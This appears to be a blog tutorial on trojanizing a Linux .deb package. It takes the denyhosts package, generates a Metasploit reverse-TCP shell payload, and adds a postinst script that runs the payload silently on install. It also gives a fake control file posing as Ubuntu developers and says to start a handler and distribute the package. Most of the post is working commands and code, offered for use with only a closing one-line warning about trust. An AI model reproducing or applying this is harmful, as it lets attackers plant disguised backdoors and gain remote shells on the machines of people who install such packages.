Fun with linux payloads and linux packages


Hackers For Charity

Just thot i should write a small tutorial on infecting .deb`s or .rpms with linux payloads.

First, download the package you are going to infect, for my test case m going to use denyhosts package.Its a simple package to drop ssh attacks. So from console type

apt-get install denyhosts

I then navigate to /var/cache/apt/archives/ on my backtrack4 machine, copy the denyhosts.deb package to another location for modification.On the new location extract the contents of the denyhosts.deb package by typing

dpkg -x denyhosts_2.6-5_all.deb test

This will create a folder called test with the contents of the package.A simple ls reveals the following folders:
etc usr var workdir

Go to msfpayload and generate yor payload. On my backtrack4 ,i prefer the linux/x86/shell/reverse_tcp.so on console,i type the following.

/pentest/exploits/framework3/msfpayload linux/x86/shell/reverse_tcp LHOST= LPORT=4444 X > linux_payload

This creates a payload called linuxpayload in your current directory.

Create a folder called DEBIAN,and in the folder create two files . control and postinst. A simple control file is for defining the package. My control file looks like the one below.

Package: denyhosts
Version: 2.2
Section: system
Priority:Optional
Architecture: i386
Maintainer: Ubuntu dvelopers
Description: Denyhosts

For the postinst file, make the file executable. contents of the postinst file should contain the payload you want to execute and the path the payload will be copied. my postinst file looks like this.

#!/bin/sh
chmod 2755 /usr/share/denyhosts/linux_payload && /usr/share/denyhosts/linux_payload &

For this to work, copy your payload (linux_payload) to the extracted foler (test) and paste in in test/usr/share/denyhosts

now we are ready to build the debian package. From console,type the following

dpkg-deb –build test

It will create a malicious .deb package inside the test folder. Start the explot/multi/handler to handle your sessions. Scp the debian package to another machine and install it with the common dpkg -i [package_name] option. Immediately the package is installed, you should recieve a reverse shell on your machine.

I dont have any rpm based system at the moment but hope somebody tries it out .
Lesson:Dont install packages from people you dont trust.

Happy hacking.

Advertisements
This entry was posted in Uncategorized. Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s